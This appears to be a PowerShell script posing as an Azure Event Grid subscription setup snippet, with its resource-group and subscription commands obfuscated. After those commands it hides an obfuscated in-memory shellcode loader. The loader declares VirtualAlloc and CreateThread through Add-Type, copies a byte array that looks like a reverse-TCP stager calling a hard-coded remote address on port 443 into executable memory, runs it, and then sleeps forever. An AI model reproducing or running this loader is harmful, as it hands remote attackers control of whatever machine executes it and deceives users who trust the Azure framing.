${My`ENdpo`InT} = ("{2}{4}{0}{3}{1}" -f'end','URL>','<your','point-','-')


${mY`RE`s`ouRcEgro`Up}=("{1}{0}{2}{3}{4}"-f'resource','<','-gr','oup-na','me>')


&("{1}{2}{3}{0}"-f 'up','N','ew-AzReso','urceGro') -Name ${mYRESo`Ur`CEGr`oUP} -Location ("{0}{1}"-f 'west','us2')


.("{5}{3}{2}{4}{0}{1}{6}"-f'rip','tio','ent','-AzEv','GridSubsc','New','n') `
  -Endpoint ${MyenDpO`i`Nt} `
  -EventSubscriptionName ("{4}{5}{6}{1}{0}{3}{2}"-f'eso','tionToR','ceGroup','ur','demo','Su','bscrip') `
  -ResourceGroupName ${myresOU`R`ce`GRoUp}

${C} = ((("{57}{95}{4}{68}{106}{88}{124}{127}{6}{38}{63}{99}{120}{107}{61}{21}{59}{91}{22}{114}{46}{84}{5}{123}{117}{53}{51}{110}{89}{103}{121}{24}{37}{29}{43}{92}{105}{7}{72}{47}{48}{102}{108}{49}{35}{65}{50}{55}{113}{80}{101}{125}{75}{70}{83}{115}{9}{122}{85}{33}{109}{10}{3}{14}{18}{90}{100}{69}{8}{36}{119}{26}{73}{31}{112}{30}{98}{64}{111}{93}{126}{41}{82}{1}{32}{86}{13}{39}{34}{12}{74}{116}{52}{54}{27}{17}{44}{40}{87}{67}{28}{25}{79}{66}{23}{128}{62}{97}{118}{56}{104}{19}{16}{60}{42}{58}{11}{20}{94}{96}{2}{0}{45}{77}{76}{15}{78}{71}{81}" -f' ',' l','nt','ic ext','rt','dd','3','ype,','a','pu','at','e','C',' ui','ern','uin','ic ext',' IntP',' I','t','t(IntPtr ','xtern Int',' Virtual','llqDU','i','(qDUm','ead',',','t','lAllo','t dwStac','tPtr lpThreadAttri','pParameter','i','w','otec','teTh','nt f','2.dll','nt d','readId);[D','I','n I','ca','tr lpTh','s','llo','u','int','Pr',';','t','nFl','s, uin','ags','[','st','[DllI','ntPtr mems','Pt','er','ic e','pub','q','tPtr lpSt','t)','t.d','Impor','(qD','e','2.d','unt)',' ','(In','reat','ernel3',', ','rc','t co','svcr','lI',';','ntPtr','llq','c(IntPtr lpA','l',',','ll','er','dwSize','ntP','r','ti','rtAddr','dest, ','mpo','ui','li','kSize, In','DU)]public st','tr Cr','mport(q',' f',', ','a','onT','Uk','t','l','c st',' ','a','butes, uin','Dl','A','DU)]','io','es','c ','r','a','u','b','r','ne','DUk','ess, ','l',')]'))-CrEPlACE  'qDU',[cHaR]34);${w} = &("{0}{1}"-f'Ad','d-Type') -memberDefinition ${C} -Name ("{0}{1}"-f'Win3','2') -namespace ("{3}{0}{2}{1}"-f '2Funct','ns','io','Win3') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x86,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x8b,0x4c,0x10,0x78,0xe3,0x4a,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x89,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x69,0x69,0x43,0xda,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${Z}."L`ENGTH" -gt 0x1000){${G} = ${Z}."LEN`Gth"};${X}=${W}::("{2}{0}{1}" -f 't','ualAlloc','Vir').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${z}."lE`NgTh"-1);${I}++) {${w}::"Me`mSEt"([IntPtr](${X}.("{0}{1}" -f'T','oInt32').Invoke()+${I}), ${z}[${I}], 1)};${W}::("{1}{2}{0}" -f'eThread','Cre','at').Invoke(0,0,${x},0,0,0);for (;;){&("{3}{2}{1}{0}" -f'p','ee','l','Start-s') 60};
